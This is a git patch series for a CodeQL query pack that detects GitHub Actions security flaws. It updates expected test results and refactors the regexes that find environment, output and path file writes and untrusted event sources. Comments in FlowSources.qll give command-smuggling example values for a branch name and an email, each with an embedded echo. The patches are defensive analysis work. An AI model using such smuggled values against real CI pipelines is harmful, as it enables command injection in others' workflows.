b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,5 +1,7 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index a40ab1fa771..9015e85b3d0 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From c6e3bafe00b9068d3b3b0ff1318a99b3b6b44f08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:35:06 +0200 Subject: [PATCH 0309/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30aa95964e1..2736e30331c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.29 +version: 0.0.30 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4c89d7804a9..451b49ec07e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.29 +version: 0.0.30 groups: - actions - queries From 3e9c19044e58220399053ccb797f371c5de21c57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:01:27 +0200 Subject: [PATCH 0310/1267] Improve bash and source regexpps --- ql/lib/codeql/actions/Helper.qll | 288 +++++++++------ ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +- .../codeql/actions/dataflow/FlowSources.qll | 344 ++++++++---------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 54 +-- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 14 +- .../actions/security/PoisonableSteps.qll | 13 +- .../.github/workflows/multiline.yml | 56 +++ ql/test/library-tests/test.expected | 319 +++++++++++++--- ql/test/library-tests/test.ql | 86 ++++- .../.github/workflows/reusable_workflow.yml | 2 +- .../CWE-077/.github/workflows/test4.yml | 15 +- .../CWE-077/EnvVarInjectionCritical.expected | 16 +- .../CWE-077/EnvVarInjectionMedium.expected | 11 +- .../CWE-094/.github/workflows/test5.yml | 13 + .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + 17 files changed, 823 insertions(+), 440 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 416cb97c8d0..563a9800214 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -10,12 +10,11 @@ string normalizeExpr(string expr) { } bindingset[regex] -string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] +string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" } + +bindingset[regex] +string wrapJsonRegexp(string regex) { + result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"] } bindingset[str] @@ -23,135 +22,190 @@ private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -bindingset[line, var] -predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) +/** Checks if expr is a bash parameter expansion */ +bindingset[expr] +predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) ) } -bindingset[var] -private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +// TODO, the followinr test fails +bindingset[raw_content] +predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) } -bindingset[var] -private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +bindingset[script] +predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) } -bindingset[var] -private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +bindingset[script] +predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) } -bindingset[script, var] -predicate extractMultilineAssignment(string script, string var, string key, string value) { +bindingset[script] +predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 3)) and + content = script.regexpCapture(regexp, 5) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 6)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 7) + ) +} + +bindingset[script] +predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 5)) + + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content + //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") + ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" + ) +} + +bindingset[script] +predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") + .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + filters = "" + ) +} + +bindingset[script] +predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) +} + +bindingset[script, file_var] +predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } -bindingset[line] -predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) +predicate writeToGitHubEnv(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_ENV", content) } -predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) +predicate writeToGitHubOutput(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) } -predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) -} - -predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) +predicate writeToGitHubPath(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_PATH", content) } predicate inPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 61f0fa8e36e..1094a152126 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -749,12 +749,19 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + or // the job is triggered by a workflow_call event that can be triggered externally this.getATriggerEvent().getName() = "workflow_call" and - (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) + ( + exists(ExpressionImpl e, string external_trigger | + e.getEnclosingJob() = this and + e.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() + ) } /** Holds if the job is privileged. */ @@ -781,9 +788,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and - not expr.getFieldName() = "GITHUB_TOKEN" + not expr.getFieldName() = "GITHUB_TOKEN" ) } @@ -814,7 +821,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + not this.getATriggerEvent().getName() = "workflow_call" or // the Workflow is a Reusable Workflow only and there is // a privileged caller workflow or we cant find a caller diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca3e21e9d25..5f2d36e7cd8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,186 +19,140 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -bindingset[context] -private predicate titleEvent(string context) { - exists(string reg | - reg = - [ - // title - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", - "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string titleEvent() { + result = + [ + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", + ] } -bindingset[context] -private predicate urlEvent(string context) { - exists(string reg | - reg = - [ - // url - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } + +private string textEvent() { + result = + [ + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + ] } -bindingset[context] -private predicate textEvent(string context) { - exists(string reg | - reg = - [ - // text - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string branchEvent() { + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . + // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + result = + [ + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", + ] } -bindingset[context] -private predicate branchEvent(string context) { - exists(string reg | - reg = - [ - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string labelEvent() { + // - They cannot contain a escaping \ + result = ["github\\.event\\.pull_request\\.head\\.label",] } -bindingset[context] -private predicate labelEvent(string context) { - exists(string reg | - reg = - [ - // label - // - They cannot contain a escaping \ - "github\\.event\\.pull_request\\.head\\.label", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string emailEvent() { + // `echo${IFS}hello`@domain.com + result = + [ + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] } -bindingset[context] -private predicate emailEvent(string context) { - exists(string reg | - reg = - [ - // email - // `echo${IFS}hello`@domain.com - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string usernameEvent() { + // All characters must be either a hyphen (-) or alphanumeric + result = + [ + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] } -bindingset[context] -private predicate usernameEvent(string context) { - exists(string reg | - reg = - [ - // username - // All characters must be either a hyphen (-) or alphanumeric - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string pathEvent() { + result = + [ + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", + ] } -bindingset[context] -private predicate pathEvent(string context) { - exists(string reg | - reg = - [ - // filename - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string jsonEvent() { + result = + [ + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", + ] + or + result = titleEvent() + or + result = urlEvent() + or + result = textEvent() + or + result = branchEvent() + or + result = labelEvent() + or + result = emailEvent() + or + result = usernameEvent() + or + result = pathEvent() } -bindingset[context] -private predicate jsonEvent(string context) { - exists(string reg | - reg = - [ - // json - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) -} - -class GitHubSource extends RemoteFlowSource { +class GitHubCtxSource extends RemoteFlowSource { string flag; - GitHubSource() { + GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and @@ -212,14 +166,15 @@ class GitHubSource extends RemoteFlowSource { override string getSourceType() { result = flag } } -class GitHubEventSource extends RemoteFlowSource { +class GitHubEventCtxSource extends RemoteFlowSource { string flag; - GitHubEventSource() { - exists(Expression e, string context | + GitHubEventCtxSource() { + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and ( + // the context is available for the job trigger events exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and @@ -227,23 +182,25 @@ class GitHubEventSource extends RemoteFlowSource { ) or exists(e.getEnclosingCompositeAction()) - ) - | - titleEvent(context) and flag = "title" - or - urlEvent(context) and flag = "url" - or - textEvent(context) and flag = "text" - or - branchEvent(context) and flag = "branch" - or - labelEvent(context) and flag = "label" - or - emailEvent(context) and flag = "email" - or - 